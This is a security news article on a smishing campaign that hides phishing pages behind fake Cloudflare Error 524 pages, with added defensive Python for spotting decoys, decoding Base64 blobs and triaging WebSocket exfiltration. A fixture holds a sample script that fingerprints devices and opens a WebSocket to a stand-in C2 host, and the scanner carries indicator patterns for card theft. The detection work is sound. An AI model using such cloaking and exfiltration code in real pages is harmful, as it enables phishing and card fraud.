Advanced Smishing Campaign Leverages Cloudflare Error Decoys for Global Evasion
The campaign’s target profile primarily includes telecommunications providers, followed closely by financial institutions and consumer loyalty programs. Researchers suggest this regional preference is driven by a combination of weak SMS anti-spoofing protocols, a “mobile-first” consumer culture, and the high efficacy of social engineering pretexts involving reward programs.
What sets this campaign apart is its layered anti-analysis architecture. To evade automated security scanners, web crawlers, and manual researcher inspection, the malicious domains employ conditional rendering. If a visitor is detected as coming from a non-target geography or as browsing from a desktop environment, the site serves a convincing imitation of a Cloudflare “Error 524” timeout page. This decoy effectively hides the malicious payload from hosting providers and security tools.
The filtering mechanism is highly granular, utilizing client-side geolocation checks and device fingerprinting. The actual phishing interface is only served to verified mobile users within targeted jurisdictions.
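The decoy described above can be told apart from a real Cloudflare error in a triage workflow. The following Python is an added example, not code from the Group-IB report: it classifies a rendered landing page (the DOM text after a headless browser has run the page's scripts) and compares the desktop and mobile renderings of the same URL. The heuristic is an assumption of this example: a genuine Cloudflare 52x page arrives with that 52x HTTP status, whereas a decoy drawn by the site's own JavaScript is delivered with status 200. Because the domains sit behind Cloudflare as a proxy, `cf-ray` and `Server: cloudflare` headers appear on both, so the status code, not the headers, is the discriminating signal. All responses below are constructed sample data.

```python
# Added example (not from the report): distinguish a genuine Cloudflare error page
# from a client-side decoy, and flag conditional rendering between two user agents.
import re
from dataclasses import dataclass

CF_ERROR_STATUSES = {520, 521, 522, 523, 524, 525, 526}


@dataclass
class Response:
    status: int
    headers: dict   # raw response headers
    body: str       # rendered DOM text (after JavaScript has executed)


def _header(resp, name):
    return {k.lower(): v for k, v in resp.headers.items()}.get(name.lower(), "")


def classify(resp):
    """Return 'genuine-cloudflare-error', 'decoy-error-page' or 'content'."""
    body_looks_like_cf_error = (
        re.search(r"Error\s+5\d\d", resp.body) is not None
        and "cloudflare" in resp.body.lower()
    )
    served_by_cf = _header(resp, "server").lower() == "cloudflare" and bool(_header(resp, "cf-ray"))
    # Assumption: a real Cloudflare error carries its own 52x status code.
    if body_looks_like_cf_error and resp.status in CF_ERROR_STATUSES and served_by_cf:
        return "genuine-cloudflare-error"
    # An "error page" that came back 200 OK was painted by the site itself.
    if body_looks_like_cf_error and resp.status == 200:
        return "decoy-error-page"
    return "content"


def cloaking_verdict(desktop, mobile):
    """Same URL fetched twice; differing classes indicate conditional rendering."""
    d, m = classify(desktop), classify(mobile)
    return {"desktop": d, "mobile": m, "conditional_rendering": d != m}


# Constructed sample responses (hostnames and headers are placeholders).
CF_HEADERS = {"Server": "cloudflare", "CF-RAY": "0000000000000000-EXAMPLE", "Content-Type": "text/html"}

DESKTOP_DECOY = Response(200, CF_HEADERS,
    "<h1>Error 524</h1><p>A timeout occurred</p><p>cloudflare</p>")
MOBILE_PHISH = Response(200, CF_HEADERS,
    "<form><h2>Claim your reward</h2><input name='phone'><input name='email'></form>")
REAL_524 = Response(524, CF_HEADERS,
    "<h1>Error 524</h1><p>A timeout occurred</p><p>cloudflare</p>")

if __name__ == "__main__":
    print(classify(REAL_524))                        # genuine-cloudflare-error
    print(cloaking_verdict(DESKTOP_DECOY, MOBILE_PHISH))
```

Fetching the URL twice, once with a desktop user agent and once with a mobile one, and then handing both rendered bodies to `cloaking_verdict` gives a takedown request the concrete evidence it needs: the hosting provider's own crawler will only ever see the decoy.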
According to Group-IB’s Digital Risk Protection team, the attackers have deployed at least 4,389 phishing domains, with Mexico, Chile, and Colombia serving as primary targets.

Breakdown of the smishing campaign’s most targeted industries in LATAM (Source: Group-IB).
Technically, this conditional logic is embedded within a Base64-encoded Single-Page Application (SPA). The malicious logic is decoded and executed only at runtime in the victim's browser, so the HTML delivered to a scanner contains an opaque encoded blob rather than readable code, making static analysis extremely difficult for defenders.
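Static analysis is not hopeless, because the encoding is only Base64. The following Python is an added example, not code from the report: it pulls long Base64 runs out of a fetched page, decodes the ones that yield valid text, and scans the decoded script for the behaviours the article attributes to the SPA (geolocation and time-zone checks, device fingerprinting, WebSocket use, card-entry forms). The indicator patterns, the length threshold and the embedded sample page are assumptions of this example; the sample page is constructed inline so the code runs offline.

```python
# Added example (not from the report): decode Base64 blobs in a page and scan the
# decoded script for indicators of conditional rendering and exfiltration.
import base64
import re

# Assumed indicator patterns; tune to your own triage needs.
INDICATORS = {
    "geolocation": re.compile(r"navigator\.geolocation|timeZone|Intl\.DateTimeFormat", re.I),
    "device-fingerprint": re.compile(r"navigator\.userAgent|maxTouchPoints|screen\.width", re.I),
    "websocket": re.compile(r"new\s+WebSocket|wss://", re.I),
    "card-form": re.compile(r"cvv|expir|card.?number", re.I),
}

# Runs of at least 120 Base64 characters; short runs are mostly noise (hashes, fonts).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")


def decode_blobs(html):
    """Yield decoded UTF-8 text for every long Base64 run that decodes cleanly."""
    out = []
    for m in B64_RUN.finditer(html):
        try:
            out.append(base64.b64decode(m.group(0), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue   # binary assets (images, fonts) or truncated runs
    return out


def scan(html):
    """Count indicator hits per category across all decoded blobs."""
    findings = {}
    for blob in decode_blobs(html):
        for name, rx in INDICATORS.items():
            if rx.search(blob):
                findings[name] = findings.get(name, 0) + 1
    return findings


# Constructed sample: a page whose only script is an atob()'d blob. The decoded
# fragment is a placeholder that merely contains the indicator strings.
_INNER_SCRIPT = """
var tz = Intl.DateTimeFormat().resolvedOptions().timeZone;
var touch = navigator.maxTouchPoints > 0;
var ua = navigator.userAgent;
var sock = new WebSocket('wss://c2.example.invalid/session');
"""
SAMPLE_HTML = (
    "<html><body><script>eval(atob(\""
    + base64.b64encode(_INNER_SCRIPT.encode()).decode()
    + "\"))</script></body></html>"
)

if __name__ == "__main__":
    print(scan(SAMPLE_HTML))   # {'geolocation': 1, 'device-fingerprint': 1, 'websocket': 1}
```

A page whose visible source is one `atob()` call and nothing else is itself a strong signal; the scanner's output then tells the analyst which behaviours to confirm in a sandboxed browser.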
Technical Breakdown: The Error 524 Decoy Lifecycle
The attack chain typically commences with an SMS-based lure—often involving urgent themes like expiring rewards or failed deliveries—sent from spoofed local numbers. The embedded shortened URLs redirect users to phishing domains that initially appear to be empty or broken.

The websites utilize a Cloudflare error page, displaying various error codes, as a deceptive landing page (Source: Group-IB).
While Latin America remains a core focus, the campaign has established significant footprints elsewhere:
- Europe: 673 confirmed domains, primarily targeting financial and logistics sectors in the Netherlands and Germany.
- APAC: 238 domains, led by Australia, focusing on telecommunications and government impersonation.
Once a user passes the initial device and location validation, they are presented with a brand-specific interface tailored to their region. The data harvesting is conducted in stages: first collecting basic identification (name, email, phone), and then escalating to highly sensitive PII and full credit card credentials.
A notable technical optimization is the use of minimal validation for payment data. Rather than performing real-time bank authorization—which would introduce latency and increase the risk of detection—the attackers rely on simple checksum (Luhn algorithm) verification. This allows for high-speed data collection and maximizes throughput.
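The Luhn check the attackers settle for is the same mod-10 checksum printed on every payment card; it catches typos, not fraud, and says nothing about whether an account exists. The following Python is an added example, not code from the report, showing the algorithm the text names; the test values are the published Luhn example `79927398713` and the well-known Visa test number `4111 1111 1111 1111`, not data from the campaign.

```python
# Added example (not from the report): the Luhn (mod 10) checksum that the page
# says is the only validation applied to harvested card numbers.

def luhn_valid(number):
    """True if the digit string passes the Luhn checksum. Spaces and dashes are ignored."""
    cleaned = number.replace(" ", "").replace("-", "")
    if len(cleaned) < 2 or not cleaned.isdigit():
        return False
    total = 0
    # Walk from the right; every second digit (starting with the second) is doubled,
    # and doubled values above 9 have 9 subtracted (equivalent to summing their digits).
    for i, ch in enumerate(reversed(cleaned)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def luhn_check_digit(partial):
    """Compute the check digit that makes `partial` + digit Luhn-valid."""
    for digit in "0123456789":
        if luhn_valid(partial + digit):
            return digit
    raise ValueError("unreachable: exactly one digit always satisfies the checksum")


if __name__ == "__main__":
    print(luhn_valid("79927398713"))          # True
    print(luhn_valid("79927398710"))          # False
    print(luhn_check_digit("7992739871"))     # 3
```

The practical consequence for defenders is that any Luhn-valid string will be accepted by such a kit, so telemetry from a suspected capture form that contains many checksum-valid but issuer-unknown numbers is consistent with this design rather than with a real payment flow.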
For data exfiltration, the attackers have moved beyond simple HTTP POST requests. Instead, they employ encrypted WebSocket (WSS) channels. This establishes a persistent, bidirectional connection between the victim’s browser and the attacker’s Command and Control (C2) server. Harvested data is transmitted as binary-encoded payloads, while “heartbeat” signals are used to monitor session integrity and user dwell time.
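The WebSocket channel described above has a detectable shape from the network side: an outbound upgrade to a throwaway domain, binary frames leaving the browser, and small frames arriving at a clockwork interval. The following Python is an added example, not code from the report, and also draws on the low-cost TLDs (.top, .ink, .click) the article names later; it triages per-connection WebSocket frame records and returns the reasons a connection looks like this exfiltration pattern. The JSON log format, the field names, the 64-byte heartbeat size and the 0.1 regularity threshold are all assumptions of this example, and the log lines are constructed.

```python
# Added example (not from the report): score WebSocket connections from constructed
# frame-level log records for the exfiltration pattern described in the article.
import json
import statistics
from collections import defaultdict

LOW_COST_TLDS = {"top", "ink", "click"}   # TLDs named in the report
HEARTBEAT_MAX_LEN = 64                     # assumed upper size of a heartbeat frame
REGULARITY_CV = 0.1                        # assumed: coefficient of variation below this is "clockwork"

# Constructed sample log: one frame per line. Fields are this example's own.
SAMPLE_LOG = """
{"conn":"c1","host":"claim-reward.top","ts":0.0,"dir":"out","opcode":"text","len":4}
{"conn":"c1","host":"claim-reward.top","ts":5.0,"dir":"out","opcode":"text","len":4}
{"conn":"c1","host":"claim-reward.top","ts":10.0,"dir":"out","opcode":"text","len":4}
{"conn":"c1","host":"claim-reward.top","ts":12.3,"dir":"out","opcode":"binary","len":612}
{"conn":"c1","host":"claim-reward.top","ts":15.0,"dir":"out","opcode":"text","len":4}
{"conn":"c1","host":"claim-reward.top","ts":18.9,"dir":"out","opcode":"binary","len":740}
{"conn":"c1","host":"claim-reward.top","ts":20.0,"dir":"out","opcode":"text","len":4}
{"conn":"c2","host":"chat.example.com","ts":1.0,"dir":"out","opcode":"text","len":120}
{"conn":"c2","host":"chat.example.com","ts":3.7,"dir":"in","opcode":"text","len":310}
{"conn":"c2","host":"chat.example.com","ts":9.0,"dir":"out","opcode":"text","len":88}
{"conn":"c2","host":"chat.example.com","ts":9.5,"dir":"in","opcode":"text","len":402}
"""


def parse_frames(log_text):
    """Group JSON-lines frame records by connection id."""
    conns = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = json.loads(line)
            conns[rec["conn"]].append(rec)
    return conns


def heartbeat_regularity(frames):
    """Coefficient of variation of gaps between small outbound frames; None if too few."""
    ts = sorted(f["ts"] for f in frames if f["dir"] == "out" and f["len"] <= HEARTBEAT_MAX_LEN)
    if len(ts) < 4:
        return None
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    return None if mean == 0 else statistics.pstdev(gaps) / mean


def score_connection(frames):
    """Return the list of reasons this connection matches the pattern (empty = clean)."""
    reasons = []
    host = frames[0]["host"]
    if host.rsplit(".", 1)[-1].lower() in LOW_COST_TLDS:
        reasons.append("low-cost-tld")
    if any(f["dir"] == "out" and f["opcode"] == "binary" for f in frames):
        reasons.append("binary-upload")
    cv = heartbeat_regularity(frames)
    if cv is not None and cv < REGULARITY_CV:
        reasons.append("periodic-heartbeat")
    return reasons


def triage(log_text):
    return {conn: score_connection(frames) for conn, frames in parse_frames(log_text).items()}


if __name__ == "__main__":
    for conn, reasons in triage(SAMPLE_LOG).items():
        print(conn, reasons or "clean")
```

Any one reason on its own is weak (plenty of legitimate sites send keepalives), so a rule should fire on the combination, and the host should additionally be checked against domain age and certificate issuance data, which this offline example does not include.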

Solicitation of full credit card credentials, including card number, expiry date, and CVV (Source: Group-IB).
Infrastructure analysis shows a sophisticated use of Cloudflare as a reverse proxy to mask origin servers, which are frequently hosted on Tencent Cloud and Alibaba Cloud infrastructure. This multi-layered approach complicates attribution and makes takedown efforts difficult, as blocking the CDN layer does not necessarily neutralize the backend infrastructure.
By combining rapid domain cycling (using low-cost TLDs like .top, .ink, and .click) with real-time encrypted exfiltration and advanced evasion, this campaign represents a significant evolution in phishing tradecraft. It highlights a shift toward cloud-native, highly automated, and performance-monitored cybercrime operations.